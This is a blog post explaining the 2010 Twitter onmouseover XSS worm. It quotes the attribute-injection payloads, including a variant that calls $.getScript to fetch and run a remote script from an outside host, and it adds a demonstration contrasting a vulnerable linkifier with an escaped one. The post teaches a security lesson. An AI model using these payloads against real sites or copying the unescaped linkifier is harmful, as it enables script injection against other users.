CloudAve
Software in Business. The Business of Software.

XSS vulnerability on twitter.com

By Guest Authors on September 21, 2010

So Judofyr found an XSS exploit on Twitter.com, and within minutes it spread like wildfire. His original tweet only set the anchor's background colour to black, but his next tweet added an onmouseover handler, and people could not stop moving the mouse over the tweet, resulting in over 40,000 tweets within 10 minutes.

The exploit:

http://judofyr.net/@"style="background:#000;color:#000;/

So Twitter did not escape the URL before inserting it into the anchor tag. The `"` after the `@` closes the href attribute early, and everything that follows is parsed as additional attributes on the `<a>` element, so arbitrary CSS (via style) and JavaScript (via event-handler attributes such as onmouseover) can be injected.

Shortly afterwards someone else built a nastier variant:

http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A ...

The huge font-size makes the anchor cover practically the whole page, so any mouse movement triggers the handler, and `$.getScript` (jQuery, already loaded on twitter.com) fetches and executes a remote script. The slashes in the script URL are written as JavaScript `\u002f` string escapes, so the payload only becomes a URL when the handler is evaluated.
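The following is an added example, not Twitter's code and not code from the original post: a toy tweet "linkifier" in JavaScript that reproduces the bug class described above, beside a hardened version that escapes the URL before interpolating it into the tag. The function names, the URL regex, the crude attribute extractor and the second payload (which uses `alert(1)` in place of the remote `$.getScript` call) are this example's own constructions; the first payload is the one quoted on the page.

```javascript
// Added illustration of the Twitter.com onmouseover bug class. Not Twitter's
// code: the regex, function names and WORM_PAYLOAD below are constructed here.

const URL_RE = /https?:\/\/\S+/g;

// Payload quoted in the post (just recolours the anchor).
const ORIGINAL_PAYLOAD = 'http://judofyr.net/@"style="background:#000;color:#000;/';

// Constructed stand-in for the worm payload: alert(1) instead of loading a
// remote script with $.getScript.
const WORM_PAYLOAD =
  'http://t.co/@"style="font-size:999999999999px;"onmouseover="alert(1)"/';

// Vulnerable: the matched URL is dropped straight into the href attribute.
// A `"` inside the URL closes href early and the remainder becomes new
// attributes (style, onmouseover, ...) on the <a> element.
function linkifyVulnerable(text) {
  return text.replace(URL_RE, (url) => `<a href="${url}">${url}</a>`);
}

// Escape the characters that carry meaning in HTML text and in
// double-quoted attribute values.
function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened: every piece of untrusted text, URL or not, is escaped before it
// is interpolated into the markup, so the payload stays a literal string
// inside the href value.
function linkifySafe(text) {
  let out = '';
  let last = 0;
  for (const m of text.matchAll(URL_RE)) {
    out += escapeHtml(text.slice(last, m.index));
    const url = escapeHtml(m[0]);
    out += `<a href="${url}">${url}</a>`;
    last = m.index + m[0].length;
  }
  return out + escapeHtml(text.slice(last));
}

// Crude check: attribute names of the first <a> tag in the rendered HTML.
// Enough for this illustration; it is not a real HTML parser.
function anchorAttributeNames(html) {
  const tag = html.match(/<a\s([^>]*)>/);
  if (!tag) return [];
  const names = [];
  for (const m of tag[1].matchAll(/([A-Za-z-]+)\s*=\s*"[^"]*"/g)) {
    names.push(m[1].toLowerCase());
  }
  return names;
}

console.log('vulnerable:', linkifyVulnerable(WORM_PAYLOAD));
console.log('attributes:', anchorAttributeNames(linkifyVulnerable(WORM_PAYLOAD)));
console.log('safe:      ', linkifySafe(WORM_PAYLOAD));
console.log('attributes:', anchorAttributeNames(linkifySafe(WORM_PAYLOAD)));
```

Run with `node`: the vulnerable output grows a `style` and an `onmouseover` attribute from the payload alone, while the escaped version keeps a single `href` whose value merely contains `&quot;` sequences the browser renders as literal quotes. Contextual escaping at the point of interpolation is the fix; encoding the URL elsewhere (or only on output of the tweet body) does not help if the anchor is built from the raw string.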

Update: Twitter has since patched this vulnerability.

(Cross-posted @ Inspired? No)

Posted in Security | Tagged social networking, twitter, twitter exploit, xss
